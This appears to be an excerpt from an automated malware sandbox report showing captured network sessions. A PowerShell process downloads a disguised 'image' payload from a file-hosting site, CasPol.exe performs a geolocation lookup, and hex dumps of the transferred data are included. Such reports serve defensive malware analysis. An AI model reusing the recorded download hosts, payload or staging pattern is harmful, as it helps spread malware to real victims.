                                                                                                                                                                                                                                Data Ascii: CzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/6Tu+MrPu6Dq+IqPc6zl


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.855651178.237.33.50803276C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                Nov 18, 2024 16:53:22.981270075 CET71OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                                Host: geoplugin.net
                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                Nov 18, 2024 16:53:23.817079067 CET1164INHTTP/1.1 200 OK
                                                                                                                                                                                                                                date: Mon, 18 Nov 2024 15:53:23 GMT
                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                content-length: 956
                                                                                                                                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                cache-control: public, max-age=300
                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 37 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 54 65 78 61 73 22 2c 0a 20 20 22 67 65 6f 70 6c [TRUNCATED]
                                                                                                                                                                                                                                Data Ascii: { "geoplugin_request":"155.94.241.187", "geoplugin_status":200, "geoplugin_delay":"1ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Dallas", "geoplugin_region":"Texas", "geoplugin_regionCode":"TX", "geoplugin_regionName":"Texas", "geoplugin_areaCode":"", "geoplugin_dmaCode":"623", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"32.8137", "geoplugin_longitude":"-96.8704", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/Chicago", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                                                                                                                                HTTPS Proxied Packets

                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                0192.168.2.849706142.215.209.78443752C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-11-18 15:52:33 UTC192OUTGET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1
                                                                                                                                                                                                                                Host: 1017.filemail.com
                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                2024-11-18 15:52:33 UTC324INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Length: 2230233
                                                                                                                                                                                                                                Content-Type: image/jpeg
                                                                                                                                                                                                                                Last-Modified: Thu, 07 Nov 2024 02:06:04 GMT
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                ETag: 4bb5a8185f3b16880e3dcc573015c5d9
                                                                                                                                                                                                                                X-Transfer-ID: wxhdiueivoluihj
                                                                                                                                                                                                                                Content-Disposition: attachment; filename=new_imagem.jpg
                                                                                                                                                                                                                                Date: Mon, 18 Nov 2024 15:52:33 GMT
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-11-18 15:52:33 UTC1979INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                                                                                                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                                                                                                2024-11-18 15:52:33 UTC8192INData Raw: b7 91 13 22 ad 06 54 03 6d fc 09 38 14 57 67 d4 4c ac a4 95 e4 10 eb 41 b6 9e d8 27 92 44 d2 46 c6 49 4d ba 83 4e 18 91 b4 d8 15 d3 00 1d a1 84 84 74 56 6e 4b 05 17 ce 19 e7 48 f4 c5 56 48 d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5
                                                                                                                                                                                                                                Data Ascii: "Tm8WgLA'DFIMNtVnKHVH%VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+
                                                                                                                                                                                                                                2024-11-18 15:52:33 UTC8192INData Raw: a6 f7 55 0c 07 e2 f1 16 a5 b4 63 20 14 08 ef 82 7d 71 2e 58 07 04 f5 17 8a 82 41 04 1a 3d 88 ca 90 4d 93 77 de f0 35 13 c5 c2 ae d6 8d 89 ff 00 15 f2 30 b1 78 8a bb 02 49 1f 4c c5 cd 0f 0e 89 24 49 77 38 56 e0 2d 8b c0 d6 66 56 60 f2 1b 0b d0 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d
                                                                                                                                                                                                                                Data Ascii: Uc }q.XA=Mw50xIL$Iw8V-fV`lW_4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^
                                                                                                                                                                                                                                2024-11-18 15:52:33 UTC8192INData Raw: 12 e8 d7 cb 1c 8f ca 82 16 42 02 28 35 f3 e0 73 8a b4 da 7d 2e e2 ce a4 3f 6a bf d3 03 3d d4 49 37 3d 46 3e 0a 6a 75 29 a7 99 76 ee 5f e1 7a 1e c2 c6 5d 20 d3 b1 33 29 06 36 16 bf c3 8a 68 a1 77 d4 c9 32 80 4a de d0 df df 00 7a b9 65 86 63 a7 40 49 1c 70 01 fe 99 55 81 fc 90 ce 08 37 76 57 fe 99 a3 0e 8a 45 69 24 99 48 95 bd 41 98 70 7e bd 3f 3c 5a 55 74 b4 92 d0 af 63 5d fd b9 c0 ab 7a 94 6d f4 8f e7 94 69 b6 45 d2 c9 f8 03 fc f2 63 06 30 54 8f 97 c7 f5 c9 78 dd 88 52 85 87 c3 01 33 a8 90 ca 3d 2b e9 3d 02 8f ed 9a c2 38 a7 41 b1 00 b1 dd 47 fe 9c 54 69 ae 45 42 a1 79 ef 8f b4 1b 2b cb 46 05 79 e0 5d e0 05 3c 2d e0 f5 6f 56 5e eb 5e f9 44 92 1d 1f 88 6e 2a 0c 6f 6a 6b f8 79 18 e3 6a 1d d7 60 85 81 61 c9 b0 3f 4b cc 49 6d 65 65 2a cc 70 3d 40 93 4e d1 5a
                                                                                                                                                                                                                                Data Ascii: B(5s}.?j=I7=F>ju)v_z] 3)6hw2Jzec@IpU7vWEi$HAp~?<ZUtc]zmiEc0TxR3=+=8AGTiEBy+Fy]<-oV^^Dn*ojkyj`a?KImee*p=@NZ
                                                                                                                                                                                                                                2024-11-18 15:52:33 UTC8192INData Raw: 70 28 8b b8 f3 9c c6 b8 1c 0c e4 e3 25 54 1b 24 8f 95 e0 50 02 78 19 20 31 34 3f 2c 66 0d 23 ea 25 11 c6 54 1a 24 96 3e 95 1e e4 f6 c7 64 d4 47 a3 88 e9 f4 84 33 91 52 4f b4 1b f8 2d f6 fd 70 33 e3 9d f4 cc 4c 64 ac 9d 37 0e df 2c a8 90 d1 b2 77 75 bc e0 42 df e1 3d fe 39 24 06 6f 4f 02 ba 7b de 05 d2 66 0c 0b 72 01 04 8b ea 31 90 11 c4 40 33 8d f0 bc 8d 66 fd 40 b5 7f 21 95 83 4b bb 4c fa 89 5b 64 6a a4 21 3c 6f 6a e0 0f ae 0c 6b 26 0a 10 37 a4 73 44 03 c7 26 be 5c e0 4c 88 86 05 7b 70 de 4e ee 7b 9d e5 7f 2a ca 4b 02 a9 d4 15 26 92 60 8a 7d c1 dd fd 86 73 6a 5d ac c8 c4 92 81 45 00 28 58 35 f2 ce 33 bb c6 c8 cd 60 90 c7 8a e8 0f eb ce 03 30 e9 f4 ec f1 19 09 a6 8f 70 4d c1 6d b7 6d ad c4 50 14 09 e7 da b2 f2 69 13 48 1a 60 86 cb 28 8c 12 29 6c 37 27 a8
                                                                                                                                                                                                                                Data Ascii: p(%T$Px 14?,f#%T$>dG3RO-p3Ld7,wuB=9$oO{fr1@3f@!KL[dj!<ojk&7sD&\L{pN{*K&`}sj]E(X53`0pMmmPiH`()l7'
                                                                                                                                                                                                                                2024-11-18 15:52:33 UTC8192INData Raw: 5e 49 c3 ea 41 58 74 97 ff 00 d0 9f ff 00 a8 d8 04 7f b4 1a b8 c0 8d 12 2b 55 da 18 c6 77 30 ae 97 78 44 fb 4f ae 66 04 e9 b4 b6 a0 05 a4 6e 78 ff 00 7b 33 5d 01 27 8b f8 60 89 e6 80 aa c0 d7 7f b5 3e 22 b6 04 1a 6e 47 45 56 af af ab 00 ff 00 69 f5 93 28 47 48 a2 62 d6 cf 1a b0 35 55 c8 bc cd 2d bb e7 95 91 55 85 1e 78 c0 f5 d3 fd a1 9e 2f 09 d0 ea 91 20 dd 36 ff 00 c4 ad 56 ad 42 bf ae 55 fc 7b 52 9e 11 1e a1 a3 88 4b 34 84 27 a1 a9 90 75 6e bf e2 a1 99 1a d0 17 ec ff 00 83 82 c2 ee 6b 27 a0 1b 86 35 ac d3 b2 f8 57 86 47 33 a4 41 23 69 4c 8e de 90 18 d8 0a 07 24 8e f4 3f 2e b8 14 1f 69 b5 2a 4b 14 89 98 73 65 0f 1f 2e 71 7d 52 cf 28 1a 99 22 8e 1d c4 33 0b 55 66 b3 d4 29 36 7e 63 06 75 29 13 83 a6 89 55 bf fa 67 f5 35 fc 07 45 f7 f7 f8 e0 1c b3 ee 66 25
                                                                                                                                                                                                                                Data Ascii: ^IAXt+Uw0xDOfnx{3]'`>"nGEVi(GHb5U-Ux/ 6VBU{RK4'unk'5WG3A#iL$?.i*Kse.q}R("3Uf)6~cu)Ug5Ef%
                                                                                                                                                                                                                                2024-11-18 15:52:33 UTC8192INData Raw: db 34 65 d2 6b a2 62 c9 6a 92 31 62 41 a2 7d f1 34 d1 4f 2f 0a 37 35 90 40 36 70 07 a7 85 a6 b5 46 21 af a6 6b 42 ba 65 85 43 c2 1d c1 a2 4f 1c f4 cc b8 24 97 47 a9 2a 16 9b f0 90 73 41 a1 4d 52 19 12 32 19 40 f5 06 22 fe 38 17 97 4b a6 d3 96 04 1d d3 50 5f 65 be 99 6d 24 5a 75 8a 30 da 8d cc c6 82 a7 a8 86 3f db 02 9a 39 93 55 a7 25 cc a8 db 5a 99 8d 81 79 ab ca 4f 2e 98 20 da 57 f0 81 c7 42 70 19 8b 44 a9 09 42 4b 7a a8 b1 5a fe 98 be bb 4b 09 85 52 b6 d5 9b f7 ae 72 ba 1d 63 b4 2d 6a 09 dd 42 87 60 2b 1c 31 79 f1 94 90 58 65 a2 0d f7 f9 60 61 47 04 72 c3 71 51 07 bf be 2a fa 6f de 6d 66 ba e7 e5 9a 6f a3 5d 04 33 49 bf 6c 65 c2 aa a1 3c 0e 96 6f 9e b8 03 6d 27 21 41 a0 18 e0 27 e4 08 98 79 6d 64 8b bf 6c 73 4a 5d 9d 90 ab 5a 8f c5 5c 13 93 2a 6d 03 6a
                                                                                                                                                                                                                                Data Ascii: 4ekbj1bA}4O/75@6pF!kBeCO$G*sAMR2@"8KP_em$Zu0?9U%ZyO. WBpDBKzZKRrc-jB`+1yXe`aGrqQ*omfo]3Ile<om'!A'ymdlsJ]Z\*mj
                                                                                                                                                                                                                                2024-11-18 15:52:33 UTC8192INData Raw: db bb 8e dd d4 e2 0a 6a d4 8b bc 66 69 a6 31 f9 66 47 31 74 db b8 d7 5b e9 75 d4 e0 51 d1 92 d9 07 a0 22 b3 73 ee 07 f5 cb e8 d1 8e b6 20 f1 96 56 60 ac b5 da c5 e2 e1 de b6 ee 6a ae 97 db 08 24 71 65 18 a8 fc 44 29 3e fd 7a fc b0 1a 85 11 9e 26 64 2c 0c 2e cc 2c 8f 50 dd 5f c9 70 4f 0a 84 8f d4 15 8c 7b d9 98 1e 4e e2 3f 95 62 fb dd 54 00 ed ef 57 fd 32 a5 d8 9d c4 92 6a b9 c0 3e d4 68 a4 d8 37 10 ca 03 73 c0 a3 78 19 94 2c d2 28 e5 43 1a 3f 0b cb 2c 8c 80 84 6a b3 76 0d 7b e0 89 b0 6f de ef 02 01 a6 07 3d 1f d9 f9 f5 12 b4 e0 ca ec aa 14 00 cc 49 17 7d 39 f8 67 9d 03 9e 97 f0 cd bf b3 c5 c0 d4 ec 04 9f 49 e3 b7 e2 c0 d0 1a 86 8f c4 84 6d 24 a1 89 e0 5f 6c 67 52 ee cc 88 19 88 0e 7f 17 cb 38 bc 51 cc 1e 50 04 8f c5 d5 9a cb 6b 59 96 25 71 1b 1f 50 51 4b
                                                                                                                                                                                                                                Data Ascii: jfi1fG1t[uQ"s V`j$qeD)>z&d,.,P_pO{N?bTW2j>h7sx,(C?,jv{o=I}9gIm$_lgR8QPkY%qPQK
                                                                                                                                                                                                                                2024-11-18 15:52:33 UTC8192INData Raw: 39 c0 72 2d 5c 51 f9 5a 63 1a 14 28 43 c8 43 75 6e 49 ab a3 b4 91 db f8 72 8f ab 49 0c ca 5c 95 3a 68 a3 4b 06 89 1b 09 1f a3 1c 4a 45 65 0a 59 40 2c 2e 83 0f ef 95 da ce aa e1 45 92 c3 93 ec 01 fe b8 1b 53 4a 34 c4 cb 21 95 43 6b 16 60 8c a5 6b f1 13 c3 75 3c 8b af 71 80 3a 88 d3 6a 46 f0 84 09 33 7e ed 5a ad 93 68 bd dc dd 8c cc 58 26 76 0c b1 d8 65 df f8 b8 db 7b 6c fc 2f 2e 51 c2 3d 83 e6 29 55 db 57 60 82 41 bc 0d 09 f5 50 9d 2b 84 31 ab 34 4b 1b d2 b1 63 b4 2d ee 37 b6 bd 3d 86 24 4a ac 6e a1 9c 7a 95 94 37 42 00 23 91 ef ce 2e 1e ec d0 15 c1 f9 e4 02 d3 38 45 04 b3 10 05 7b e0 3c 5a 09 b4 fa 7d fa 88 d0 c5 19 57 42 ad b8 9d cc dc 50 ae fe f8 64 f1 08 9b 54 da 96 11 6e 5d 43 4c 37 86 be 4a 90 06 d2 01 3e 9e e4 66 72 c1 3b 48 a8 a0 33 35 d2 86 06 c8
                                                                                                                                                                                                                                Data Ascii: 9r-\QZc(CCunIrI\:hKJEeY@,.ESJ4!Ck`ku<q:jF3~ZhX&ve{l/.Q=)UW`AP+14Kc-7=$Jnz7B#.8E{<Z}WBPdTn]CL7J>fr;H35
                                                                                                                                                                                                                                2024-11-18 15:52:33 UTC8192INData Raw: 02 29 e7 ae 00 34 31 79 72 e9 40 e8 4b 93 ff 00 28 cd 82 ab b3 91 ea f7 c4 63 8d 91 61 90 0b 3b d8 57 fc 2b 8c ce f2 30 0b 1f 04 8c 0a 13 64 ee 16 33 8c 4a ca 59 78 38 36 49 43 80 09 62 47 35 8e 40 ac ab 4d 5f 1c 0f 3d a8 8e fc 63 a5 f0 b6 7d ba 62 fe 20 a5 dd 12 c3 05 04 0a f6 e3 34 75 30 b0 f1 26 65 23 d5 b7 9b ed 43 03 3e 9c a0 42 54 7a 83 72 3b d8 c0 5a 5d 38 ff 00 66 c6 6c 9a a0 c0 0e 3a 8c 5f 4b a3 47 9a 47 dc 54 46 6d 68 f2 73 4a 99 74 2d 43 b0 02 c7 eb 89 2c 54 49 22 fe 5c 60 2d ae 8d 5a 65 20 35 6d aa 3d 7a 9c d2 96 05 9a 17 55 6d c4 02 68 8b e7 da b1 59 93 7b 86 f5 6d ac 70 90 15 c8 52 24 22 94 a9 ed 56 3f 5c 0c 79 50 6e 05 15 59 56 b9 0b 42 f9 24 65 5c b1 66 05 55 43 30 6b 0a 0e 3a f1 5b 72 85 58 fe 2a e8 70 26 23 7e f8 01 48 12 52 06 fd ac cd
                                                                                                                                                                                                                                Data Ascii: )41yr@K(ca;W+0d3JYx86ICbG5@M_=c}b 4u0&e#C>BTzr;Z]8fl:_KGGTFmhsJt-C,TI"\`-Ze 5m=zUmhY{mpR$"V?\yPnYVB$e\fUC0k:[rX*p&#~HR


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                1192.168.2.85566494.245.104.564436952C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-11-18 15:53:38 UTC428OUTGET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1
                                                                                                                                                                                                                                Host: api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                2024-11-18 15:53:39 UTC584INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Type: application/x-protobuf; charset=utf-8
                                                                                                                                                                                                                                Date: Mon, 18 Nov 2024 15:53:38 GMT
                                                                                                                                                                                                                                Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                Set-Cookie: ARRAffinity=0b51276b42764abb6a267ed9848a33fb1623ecf1a727257141c3c00adc2ec6dd;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                Set-Cookie: ARRAffinitySameSite=0b51276b42764abb6a267ed9848a33fb1623ecf1a727257141c3c00adc2ec6dd;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com
                                                                                                                                                                                                                                Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9
                                                                                                                                                                                                                                X-Powered-By: ASP.NET


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                2192.168.2.855677172.217.16.1934436952C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-11-18 15:53:42 UTC594OUTGET /crx/blobs/AW50ZFuKxXfmS97pgdN117JdnzteDOW0nOxXPbIMSOJi_zMXlj_Y84pRZgGX1_WSw7i6yKhrqpdS319KewJbpE_4ZxBd62lsUferdiEuq7Yg9JR92C5gtrLldrMl4JgnY0IAxlKa5RR9kAwB758lMbnQOIDqR06lx1aH/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_83_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                2024-11-18 15:53:42 UTC566INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Content-Length: 135771
                                                                                                                                                                                                                                X-GUploader-UploadID: AFiumC4aLkN4vLfx9Ko-Kyn2_Aqimi4nXxGXfYQ7A9BuUNzlci1gEIyelbKyXlYP7WA06kvj9xQ
                                                                                                                                                                                                                                X-Goog-Hash: crc32c=5YFIVw==
                                                                                                                                                                                                                                Server: UploadServer
                                                                                                                                                                                                                                Date: Sun, 17 Nov 2024 17:35:54 GMT
                                                                                                                                                                                                                                Expires: Mon, 17 Nov 2025 17:35:54 GMT
                                                                                                                                                                                                                                Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                Age: 80268
                                                                                                                                                                                                                                Last-Modified: Tue, 22 Oct 2024 20:33:19 GMT
                                                                                                                                                                                                                                ETag: a1239f8c_b608f476_b1045d58_830b10c8_3ed9cb2d
                                                                                                                                                                                                                                Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                2024-11-18 15:53:42 UTC812INData Raw: 43 72 32 34 03 00 00 00 e2 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                2024-11-18 15:53:42 UTC1378INData Raw: 5a f7 ba 97 f1 3f fe f5 43 56 d7 f2 f3 3c 8c e7 4b ff e3 ef 3f c6 cf aa aa f3 6b fd 97 a1 fa fc cb e9 ac aa 1f 7f fd 71 3d bf f7 95 fc 59 5e fa b1 ea c7 1f 7f ff d7 8f 21 7f a8 4b 2e f5 e7 ab 47 d8 14 a6 6d 08 6e 1b a9 59 d7 a5 59 ab f2 b1 7f e2 d6 f5 9c 75 d3 57 66 8e a7 d2 54 4f 22 d9 3f a1 dd 8b 8d ce f7 b3 f0 55 2f 52 64 ec 9b cb 59 7f be 8e 1a 6a ee bf ff de a9 ab 48 a3 f3 51 8d bf ec 7b b7 96 fe fb f9 78 de 4f 51 f3 7e 2b 7d bb ff fe 4c d9 39 5f 12 3a 97 2c 45 97 ef ef 0b 13 71 f1 30 26 ce df 1f 49 3b 62 c4 e0 48 bb b1 11 3e ea f2 8e 02 39 b3 7d 09 42 84 80 d8 92 2e 7c e4 41 b8 a9 7c 61 8b 47 e8 1c 82 eb b9 f4 a1 91 6f f7 4f 7b e5 5c 0b 13 d5 85 cf e6 83 09 bb 83 09 54 69 a1 5a 98 fa ba 1b e6 c2 dc 9c 0f db f0 51 98 ce ef f3 fc 7e b6 70 ca 3d d5 33
                                                                                                                                                                                                                                Data Ascii: Z?CV<K?kq=Y^!K.GmnYYuWfTO"?U/RdYjHQ{xOQ~+}L9_:,Eq0&I;bH>9}B.|A|aGoO{\TiZQ~p=3
                                                                                                                                                                                                                                2024-11-18 15:53:42 UTC1378INData Raw: d1 78 a4 43 22 82 21 af 78 ed e5 3b 17 31 63 f2 12 16 6f 58 13 8a ac 6b 1f 08 96 b6 8e 59 b4 c8 5e 7b ff 95 e3 e3 6c 66 93 48 75 bd 57 d8 44 86 61 51 06 73 e9 21 bf d8 c1 38 0f 10 8e 94 67 c9 ae de 62 0f 6a 0d 08 71 f9 00 01 36 e4 d7 e2 f8 fd 7e ad e7 de 90 39 1c a3 5e 29 61 4c ee 81 a2 7b 44 c7 8e 2a b9 2d 76 d2 4b 76 32 2c a9 88 31 c0 6e d9 6b 8d a6 5a 8f 18 9d a2 60 79 ed cb ff 87 06 97 0d 1e 32 a3 56 32 10 9f b9 a9 d2 c4 8b 46 12 b8 5e dc 88 5e 98 61 86 3b 1d 0a 96 7b 16 9e c8 68 27 de 4a 05 5d 6c ca cd 72 ee c9 b5 fc 47 ed 73 37 d8 17 1e 9a eb 56 7a a1 49 00 ec 50 20 44 6e 0c 07 32 6b 0d f0 31 8f 82 17 33 36 ef 77 16 e0 38 a3 78 57 75 ef f7 45 fe d6 da dc 1b 3c a4 60 9b 5a c3 ab 54 de 7c 84 75 4b 00 a2 d8 aa 43 dd 63 24 a2 05 b3 ee 75 a8 ae 07 7e 6c
